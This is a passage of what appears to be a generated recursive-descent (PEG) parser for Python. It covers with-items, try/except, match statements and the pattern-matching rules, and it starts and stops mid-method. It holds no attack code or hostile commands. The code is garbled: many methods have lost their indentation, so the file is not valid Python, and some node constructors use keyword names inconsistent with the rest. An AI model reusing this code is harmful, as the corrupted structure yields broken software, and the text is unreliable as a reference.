        # with_item: expression 'as' star_target &(',' | ')' | ':') | invalid_with_item | expression
        """Parse one with-statement item, with or without an 'as' target."""
        mark = self._mark()
        if (
            (e := self.expression())
            and
            (literal := self.expect('as'))
            and
            (t := self.star_target())
            and
            # the 'as' form must be followed by ',' / ')' / ':' (not consumed)
            self.positive_lookahead(self._tmp_62, )
        ):
            return ast . withitem ( context_expr = e , optional_vars = t )
        self._reset(mark)
        if (
            (invalid_with_item := self.invalid_with_item())
        ):
            return None # pragma: no cover
        self._reset(mark)
        if (
            (e := self.expression())
        ):
            return ast . withitem ( context_expr = e , optional_vars = None )
        self._reset(mark)
        return None
    @memoize
    def try_stmt(self) -> Optional[ast . Try]:
        # try_stmt: invalid_try_stmt | 'try' &&':' block finally_block | 'try' &&':' block except_block+ else_block? finally_block?
        """Parse a try statement: either try/finally, or try with one or
        more except blocks plus optional else/finally."""
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (invalid_try_stmt := self.invalid_try_stmt())
        ):
            return None # pragma: no cover
        self._reset(mark)
        if (
            (literal := self.expect('try'))
            and
            (forced := self.expect_forced(self.expect(':'), "':'"))
            and
            (b := self.block())
            and
            (f := self.finally_block())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Try ( body = b , handlers = [] , orelse = [] , finalbody = f , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('try'))
            and
            (forced := self.expect_forced(self.expect(':'), "':'"))
            and
            (b := self.block())
            and
            (ex := self._loop1_63())
            and
            (el := self.else_block(),)
            and
            (f := self.finally_block(),)
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Try ( body = b , handlers = ex , orelse = el or [] , finalbody = f or [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def except_block(self) -> Optional[ast . ExceptHandler]:
        # except_block: invalid_except_stmt_indent | 'except' expression ['as' NAME] ':' block | 'except' ':' block | invalid_except_stmt
        """Parse one except clause, with optional exception type and
        'as NAME' binding."""
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (invalid_except_stmt_indent := self.invalid_except_stmt_indent())
        ):
            return None # pragma: no cover
        self._reset(mark)
        if (
            (literal := self.expect('except'))
            and
            (e := self.expression())
            and
            (t := self._tmp_64(),)
            and
            (literal_1 := self.expect(':'))
            and
            (b := self.block())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . ExceptHandler ( type = e , name = t , body = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('except'))
            and
            (literal_1 := self.expect(':'))
            and
            (b := self.block())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . ExceptHandler ( type = None , name = None , body = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (invalid_except_stmt := self.invalid_except_stmt())
        ):
            return None # pragma: no cover
        self._reset(mark)
        return None
@memoize
def finally_block(self) -> Optional[list]:
# finally_block: invalid_finally_stmt | 'finally' &&':' block
mark = self._mark()
if (
(invalid_finally_stmt := self.invalid_finally_stmt())
):
return None # pragma: no cover
self._reset(mark)
if (
(literal := self.expect('finally'))
and
(forced := self.expect_forced(self.expect(':'), "':'"))
and
(a := self.block())
):
return a
self._reset(mark)
return None
    @memoize
    def match_stmt(self) -> Optional["ast.Match"]:
        # match_stmt: "match" subject_expr ':' NEWLINE INDENT case_block+ DEDENT | invalid_match_stmt
        """Parse a match statement ("match" is a soft keyword, hence the
        string literal) with one or more indented case blocks."""
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (literal := self.expect("match"))
            and
            (subject := self.subject_expr())
            and
            (literal_1 := self.expect(':'))
            and
            (_newline := self.expect('NEWLINE'))
            and
            (_indent := self.expect('INDENT'))
            and
            (cases := self._loop1_65())
            and
            (_dedent := self.expect('DEDENT'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Match ( subject = subject , cases = cases , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (invalid_match_stmt := self.invalid_match_stmt())
        ):
            return None # pragma: no cover
        self._reset(mark)
        return None
    @memoize
    def subject_expr(self) -> Optional[Any]:
        # subject_expr: star_named_expression ',' star_named_expressions? | named_expression
        """Parse the subject of a match statement; a comma makes it a
        Tuple. Pattern matching requires Python 3.10+."""
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (value := self.star_named_expression())
            and
            (literal := self.expect(','))
            and
            (values := self.star_named_expressions(),)
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return self . check_version ( ( 3 , 10 ) , "Pattern matching is" , ast . Tuple ( elts = [value] + ( values or [] ) , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
        self._reset(mark)
        if (
            (e := self.named_expression())
        ):
            return self . check_version ( ( 3 , 10 ) , "Pattern matching is" , e )
        self._reset(mark)
        return None
@memoize
def case_block(self) -> Optional["ast.match_case"]:
# case_block: invalid_case_block | "case" patterns guard? ':' block
mark = self._mark()
if (
(invalid_case_block := self.invalid_case_block())
):
return None # pragma: no cover
self._reset(mark)
if (
(literal := self.expect("case"))
and
(pattern := self.patterns())
and
(guard := self.guard(),)
and
(literal_1 := self.expect(':'))
and
(body := self.block())
):
return ast . match_case ( pattern = pattern , guard = guard , body = body )
self._reset(mark)
return None
@memoize
def guard(self) -> Optional[Any]:
# guard: 'if' named_expression
mark = self._mark()
if (
(literal := self.expect('if'))
and
(guard := self.named_expression())
):
return guard
self._reset(mark)
return None
    @memoize
    def patterns(self) -> Optional[Any]:
        # patterns: open_sequence_pattern | pattern
        """Parse a top-level case pattern; an unparenthesized sequence
        becomes an ast.MatchSequence."""
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (patterns := self.open_sequence_pattern())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . MatchSequence ( patterns = patterns , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (pattern := self.pattern())
        ):
            return pattern
        self._reset(mark)
        return None
@memoize
def pattern(self) -> Optional[Any]:
# pattern: as_pattern | or_pattern
mark = self._mark()
if (
(as_pattern := self.as_pattern())
):
return as_pattern
self._reset(mark)
if (
(or_pattern := self.or_pattern())
):
return or_pattern
self._reset(mark)
return None
    @memoize
    def as_pattern(self) -> Optional["ast.MatchAs"]:
        # as_pattern: or_pattern 'as' pattern_capture_target | invalid_as_pattern
        """Parse 'PATTERN as NAME' into an ast.MatchAs node."""
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (pattern := self.or_pattern())
            and
            (literal := self.expect('as'))
            and
            (target := self.pattern_capture_target())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . MatchAs ( pattern = pattern , name = target , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (invalid_as_pattern := self.invalid_as_pattern())
        ):
            return None # pragma: no cover
        self._reset(mark)
        return None
    @memoize
    def or_pattern(self) -> Optional["ast.MatchOr"]:
        # or_pattern: '|'.closed_pattern+
        """Parse '|'-separated patterns; a single pattern is returned
        as-is, two or more are wrapped in ast.MatchOr."""
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (patterns := self._gather_66())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . MatchOr ( patterns = patterns , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if len ( patterns ) > 1 else patterns [0]
        self._reset(mark)
        return None
@memoize
def closed_pattern(self) -> Optional[Any]:
# closed_pattern: literal_pattern | capture_pattern | wildcard_pattern | value_pattern | group_pattern | sequence_pattern | mapping_pattern | class_pattern
mark = self._mark()
if (
(literal_pattern := self.literal_pattern())
):
return literal_pattern
self._reset(mark)
if (
(capture_pattern := self.capture_pattern())
):
return capture_pattern
self._reset(mark)
if (
(wildcard_pattern := self.wildcard_pattern())
):
return wildcard_pattern
self._reset(mark)
if (
(value_pattern := self.value_pattern())
):
return value_pattern
self._reset(mark)
if (
(group_pattern := self.group_pattern())
):
return group_pattern
self._reset(mark)
if (
(sequence_pattern := self.sequence_pattern())
):
return sequence_pattern
self._reset(mark)
if (
(mapping_pattern := self.mapping_pattern())
):
return mapping_pattern
self._reset(mark)
if (
(class_pattern := self.class_pattern())
):
return class_pattern
self._reset(mark)
return None
    @memoize
    def literal_pattern(self) -> Optional[Any]:
        # literal_pattern: signed_number !('+' | '-') | complex_number | strings | 'None' | 'True' | 'False'
        """Parse a literal pattern: numbers and strings become
        ast.MatchValue; None/True/False become ast.MatchSingleton."""
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (value := self.signed_number())
            and
            # a following '+'/'-' means this is really a complex number
            self.negative_lookahead(self._tmp_68, )
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . MatchValue ( value = value , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (value := self.complex_number())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . MatchValue ( value = value , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (value := self.strings())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . MatchValue ( value = value , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('None'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . MatchSingleton ( value = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('True'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . MatchSingleton ( value = True , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('False'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . MatchSingleton ( value = False , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def literal_expr(self) -> Optional[Any]:
        # literal_expr: signed_number !('+' | '-') | complex_number | strings | 'None' | 'True' | 'False'
        """Parse a literal as a plain expression (for mapping-pattern keys
        and class-pattern arguments); unlike literal_pattern, numbers and
        strings are returned unwrapped."""
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (signed_number := self.signed_number())
            and
            self.negative_lookahead(self._tmp_69, )
        ):
            return signed_number
        self._reset(mark)
        if (
            (complex_number := self.complex_number())
        ):
            return complex_number
        self._reset(mark)
        if (
            (strings := self.strings())
        ):
            return strings
        self._reset(mark)
        if (
            (literal := self.expect('None'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Constant ( value = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('True'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Constant ( value = True , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('False'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Constant ( value = False , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def complex_number(self) -> Optional[Any]:
        # complex_number: signed_real_number '+' imaginary_number | signed_real_number '-' imaginary_number
        """Parse a complex literal 'REAL +/- IMAGj' as an ast.BinOp of
        the two constants (mirrors how CPython represents it)."""
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (real := self.signed_real_number())
            and
            (literal := self.expect('+'))
            and
            (imag := self.imaginary_number())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . BinOp ( left = real , op = ast . Add ( ) , right = imag , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (real := self.signed_real_number())
            and
            (literal := self.expect('-'))
            and
            (imag := self.imaginary_number())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . BinOp ( left = real , op = ast . Sub ( ) , right = imag , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def signed_number(self) -> Optional[Any]:
        # signed_number: NUMBER | '-' NUMBER
        """Parse a number with optional leading '-'; the negative form is
        a UnaryOp(USub) around the Constant, as CPython builds it."""
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.number())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Constant ( value = ast . literal_eval ( a . string ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('-'))
            and
            (a := self.number())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            # inner Constant gets the NUMBER token's own span; the UnaryOp
            # span starts at the '-' sign
            return ast . UnaryOp ( op = ast . USub ( ) , operand = ast . Constant ( value = ast . literal_eval ( a . string ) , lineno = a . start [0] , col_offset = a . start [1] , end_lineno = a . end [0] , end_col_offset = a . end [1] ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
        self._reset(mark)
        return None
    @memoize
    def signed_real_number(self) -> Optional[Any]:
        # signed_real_number: real_number | '-' real_number
        """Parse a real number with optional leading '-' (used as the
        real part of a complex literal)."""
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (real_number := self.real_number())
        ):
            return real_number
        self._reset(mark)
        if (
            (literal := self.expect('-'))
            and
            (real := self.real_number())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . UnaryOp ( op = ast . USub ( ) , operand = real , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
@memoize
def real_number(self) -> Optional[ast . Constant]:
# real_number: NUMBER
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(real := self.number())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Constant ( value = self . ensure_real ( real . string ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def imaginary_number(self) -> Optional[ast . Constant]:
# imaginary_number: NUMBER
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(imag := self.number())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Constant ( value = self . ensure_imaginary ( imag . string ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
    @memoize
    def capture_pattern(self) -> Optional[Any]:
        # capture_pattern: pattern_capture_target
        """Parse a bare-name capture pattern into ast.MatchAs(pattern=None,
        name=NAME)."""
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (target := self.pattern_capture_target())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . MatchAs ( pattern = None , name = target , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def pattern_capture_target(self) -> Optional[str]:
        # pattern_capture_target: !"_" NAME !('.' | '(' | '=')
        """Parse a capture target name: not '_' (that is the wildcard) and
        not followed by '.', '(' or '=' (those are value/class patterns)."""
        mark = self._mark()
        if (
            self.negative_lookahead(self.expect, "_")
            and
            (name := self.name())
            and
            self.negative_lookahead(self._tmp_70, )
        ):
            return name . string
        self._reset(mark)
        return None
@memoize
def wildcard_pattern(self) -> Optional["ast.MatchAs"]:
# wildcard_pattern: "_"
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect("_"))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchAs ( pattern = None , target = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def value_pattern(self) -> Optional["ast.MatchValue"]:
# value_pattern: attr !('.' | '(' | '=')
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(attr := self.attr())
and
self.negative_lookahead(self._tmp_71, )
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchValue ( value = attr , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize_left_rec
def attr(self) -> Optional[ast . Attribute]:
# attr: name_or_attr '.' NAME
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(value := self.name_or_attr())
and
(literal := self.expect('.'))
and
(attr := self.name())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Attribute ( value = value , attr = attr . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@logger
def name_or_attr(self) -> Optional[Any]:
# name_or_attr: attr | NAME
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(attr := self.attr())
):
return attr
self._reset(mark)
if (
(name := self.name())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Name ( id = name . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def group_pattern(self) -> Optional[Any]:
# group_pattern: '(' pattern ')'
mark = self._mark()
if (
(literal := self.expect('('))
and
(pattern := self.pattern())
and
(literal_1 := self.expect(')'))
):
return pattern
self._reset(mark)
return None
@memoize
def sequence_pattern(self) -> Optional["ast.MatchSequence"]:
# sequence_pattern: '[' maybe_sequence_pattern? ']' | '(' open_sequence_pattern? ')'
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('['))
and
(patterns := self.maybe_sequence_pattern(),)
and
(literal_1 := self.expect(']'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchSequence ( patterns = patterns or [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('('))
and
(patterns := self.open_sequence_pattern(),)
and
(literal_1 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchSequence ( patterns = patterns or [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def open_sequence_pattern(self) -> Optional[Any]:
# open_sequence_pattern: maybe_star_pattern ',' maybe_sequence_pattern?
mark = self._mark()
if (
(pattern := self.maybe_star_pattern())
and
(literal := self.expect(','))
and
(patterns := self.maybe_sequence_pattern(),)
):
return [pattern] + ( patterns or [] )
self._reset(mark)
return None
@memoize
def maybe_sequence_pattern(self) -> Optional[Any]:
# maybe_sequence_pattern: ','.maybe_star_pattern+ ','?
mark = self._mark()
if (
(patterns := self._gather_72())
and
(opt := self.expect(','),)
):
return patterns
self._reset(mark)
return None
@memoize
def maybe_star_pattern(self) -> Optional[Any]:
# maybe_star_pattern: star_pattern | pattern
mark = self._mark()
if (
(star_pattern := self.star_pattern())
):
return star_pattern
self._reset(mark)
if (
(pattern := self.pattern())
):
return pattern
self._reset(mark)
return None
@memoize
def star_pattern(self) -> Optional[Any]:
# star_pattern: '*' pattern_capture_target | '*' wildcard_pattern
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('*'))
and
(target := self.pattern_capture_target())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchStar ( name = target , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('*'))
and
(wildcard_pattern := self.wildcard_pattern())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchStar ( target = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def mapping_pattern(self) -> Optional[Any]:
# mapping_pattern: '{' '}' | '{' double_star_pattern ','? '}' | '{' items_pattern ',' double_star_pattern ','? '}' | '{' items_pattern ','? '}'
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('{'))
and
(literal_1 := self.expect('}'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchMapping ( keys = [] , patterns = [] , rest = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('{'))
and
(rest := self.double_star_pattern())
and
(opt := self.expect(','),)
and
(literal_1 := self.expect('}'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchMapping ( keys = [] , patterns = [] , rest = rest , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('{'))
and
(items := self.items_pattern())
and
(literal_1 := self.expect(','))
and
(rest := self.double_star_pattern())
and
(opt := self.expect(','),)
and
(literal_2 := self.expect('}'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchMapping ( keys = [k for k , _ in items] , patterns = [p for _ , p in items] , rest = rest , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
self._reset(mark)
if (
(literal := self.expect('{'))
and
(items := self.items_pattern())
and
(opt := self.expect(','),)
and
(literal_1 := self.expect('}'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchMapping ( keys = [k for k , _ in items] , patterns = [p for _ , p in items] , rest = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
self._reset(mark)
return None
@memoize
def items_pattern(self) -> Optional[Any]:
# items_pattern: ','.key_value_pattern+
mark = self._mark()
if (
(_gather_74 := self._gather_74())
):
return _gather_74
self._reset(mark)
return None
@memoize
def key_value_pattern(self) -> Optional[Any]:
# key_value_pattern: (literal_expr | attr) ':' pattern
mark = self._mark()
if (
(key := self._tmp_76())
and
(literal := self.expect(':'))
and
(pattern := self.pattern())
):
return ( key , pattern )
self._reset(mark)
return None
@memoize
def double_star_pattern(self) -> Optional[Any]:
# double_star_pattern: '**' pattern_capture_target
mark = self._mark()
if (
(literal := self.expect('**'))
and
(target := self.pattern_capture_target())
):
return target
self._reset(mark)
return None
@memoize
def class_pattern(self) -> Optional["ast.MatchClass"]:
# class_pattern: name_or_attr '(' ')' | name_or_attr '(' positional_patterns ','? ')' | name_or_attr '(' keyword_patterns ','? ')' | name_or_attr '(' positional_patterns ',' keyword_patterns ','? ')' | invalid_class_pattern
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(cls := self.name_or_attr())
and
(literal := self.expect('('))
and
(literal_1 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchClass ( cls = cls , patterns = [] , kwd_attrs = [] , kwd_patterns = [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(cls := self.name_or_attr())
and
(literal := self.expect('('))
and
(patterns := self.positional_patterns())
and
(opt := self.expect(','),)
and
(literal_1 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchClass ( cls = cls , patterns = patterns , kwd_attrs = [] , kwd_patterns = [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(cls := self.name_or_attr())
and
(literal := self.expect('('))
and
(keywords := self.keyword_patterns())
and
(opt := self.expect(','),)
and
(literal_1 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchClass ( cls = cls , patterns = [] , kwd_attrs = [k for k , _ in keywords] , kwd_patterns = [p for _ , p in keywords] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
self._reset(mark)
if (
(cls := self.name_or_attr())
and
(literal := self.expect('('))
and
(patterns := self.positional_patterns())
and
(literal_1 := self.expect(','))
and
(keywords := self.keyword_patterns())
and
(opt := self.expect(','),)
and
(literal_2 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchClass ( cls = cls , patterns = patterns , kwd_attrs = [k for k , _ in keywords] , kwd_patterns = [p for _ , p in keywords] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
self._reset(mark)
if (
(invalid_class_pattern := self.invalid_class_pattern())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def positional_patterns(self) -> Optional[Any]:
# positional_patterns: ','.pattern+
mark = self._mark()
if (
(args := self._gather_77())
):
return args
self._reset(mark)
return None
@memoize
def keyword_patterns(self) -> Optional[Any]:
# keyword_patterns: ','.keyword_pattern+
mark = self._mark()
if (
(_gather_79 := self._gather_79())
):
return _gather_79
self._reset(mark)
return None
@memoize
def keyword_pattern(self) -> Optional[Any]:
# keyword_pattern: NAME '=' pattern
mark = self._mark()
if (
(arg := self.name())
and
(literal := self.expect('='))
and
(value := self.pattern())
):
return ( arg . string , value )
self._reset(mark)
return None
@memoize
def expressions(self) -> Optional[Any]:
# expressions: expression ((',' expression))+ ','? | expression ',' | expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.expression())
and
(b := self._loop1_81())
and
(opt := self.expect(','),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Tuple ( elts = [a] + b , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.expression())
and
(literal := self.expect(','))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Tuple ( elts = [a] , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(expression := self.expression())
):
return expression
self._reset(mark)
return None
@memoize
def expression(self) -> Optional[Any]:
# expression: invalid_expression | disjunction 'if' disjunction 'else' expression | disjunction '?' !'?' disjunction ':' expression | disjunction | lambdef
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(invalid_expression := self.invalid_expression())
):
return None # pragma: no cover
self._reset(mark)
if (
(a := self.disjunction())
and
(literal := self.expect('if'))
and
(b := self.disjunction())
and
(literal_1 := self.expect('else'))
and
(c := self.expression())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
